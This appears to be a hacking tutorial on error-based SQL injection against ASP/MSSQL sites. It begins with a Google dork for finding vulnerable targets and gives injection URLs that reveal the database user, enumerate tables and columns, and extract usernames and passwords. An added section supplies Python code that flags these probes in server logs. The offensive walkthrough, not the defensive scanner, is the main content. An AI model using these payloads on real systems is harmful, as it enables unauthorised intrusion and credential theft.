MSSQL Injection
Ex: Google dork:
inurl:.asp?id=
Find a result like:
http://www.somesite.com/some.asp?ID=12
Now, to check whether it is vulnerable, append a single quotation mark ' at the end:
http://www.somesite.com/some.asp?ID=12'
You get an error like this:
-------------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/some.asp, line 86
-------------------------------------------------
Then you can proceed:
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,system_user)
(* here you can observe that we are trying to convert, but the conversion fails, which in turn shows the db name that it can't convert into int.)
So it shows an error containing the db name, like:
--------------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'usr' to a column of data type int.
/some.asp, line 86
---------------------------------------------------------------
In the error it shows the db name as "usr".
Now we try to list all the available tables in the database:
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))
(here information_schema is the database; you can find this in myphp as well.)
We get an error like:
----------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'galery' to a column of data type int.
/some.asp, line 86
-----------------------------------------------
(here the table name is galery)
But no login credentials will be in the galery table. To find the second table name:
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('galery')))
We get the table name as users.
Now, to find the columns in the users table:
http://www.somesite.com/site.asp?ID=12+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'))
We get this:
-----------------------------------------------
Error: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'username' to a column of data type int.
/some.asp, line 86
-----------------------------------------------
To find the second column, follow the same step used above for finding the second table name.
Now we need to find the values in the table with the columns username and password:
http://www.somesite.com/some.asp?ID=12+and+1=convert(int,(select+top+1+username+from+users))
Do the same to find the value in the password field.
Got it?
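From the defending side, the probes above leave a distinctive footprint in web-server logs: convert(int, ...) wrapped around system_user or information_schema queries, and a lone quote followed by a 500 response when the OLE DB error reaches the client. The following is an added example, not part of the original write-up, that scans constructed log lines for exactly those markers; the log layout (ip method url status) and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the error-based probes shown in this walkthrough, applied to
# each URL-decoded query parameter value ('+' and %xx already decoded).
SIGNATURES = {
    "error_based_convert": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "catalog_enumeration": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I),
    "system_user_probe": re.compile(r"\bsystem_user\b", re.I),
    "quote_probe": re.compile(r"'"),  # noisy alone (O'Brien), telling beside a 500
}

# Constructed log format (hypothetical, not a real IIS layout): ip method url status
LOG_LINE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")

def classify_query(url):
    """Return the sorted names of every signature matching a decoded query value."""
    flags = set()
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        flags.update(sig for sig, pat in SIGNATURES.items() if pat.search(value))
    return sorted(flags)

def scan_log(lines):
    """Flag suspicious requests: a SQL probe is 'high'; a bare quote is 'medium'
    when the server answered 500 (the ODBC error leaked to the client) else 'low'."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line.strip())
        flags = classify_query(m["url"]) if m else []
        if not flags:
            continue
        if any(f != "quote_probe" for f in flags):
            severity = "high"
        elif m["status"] == "500":
            severity = "medium"
        else:
            severity = "low"
        findings.append({"line": n, "ip": m["ip"], "status": m["status"],
                         "flags": flags, "severity": severity})
    return findings

# Constructed sample log, not captured traffic; lines 2-4 mirror the probes above.
SAMPLE_LOG = [
    "203.0.113.5 GET /some.asp?ID=12 200",
    "203.0.113.5 GET /some.asp?ID=12' 500",
    "203.0.113.5 GET /some.asp?ID=12+and+1=convert(int,system_user) 500",
    "203.0.113.5 GET /some.asp?ID=12+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 500",
    "198.51.100.7 GET /search.asp?name=O'Brien 200",
]
```

Running scan_log(SAMPLE_LOG) rates lines 3 and 4 high, the lone-quote line that drew a 500 medium, and the O'Brien search low; the 500 correlation is what separates an error-leaking page from ordinary apostrophes in input.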
[ * Warning: I'm not responsible for your actions; this is for educational purposes only. ]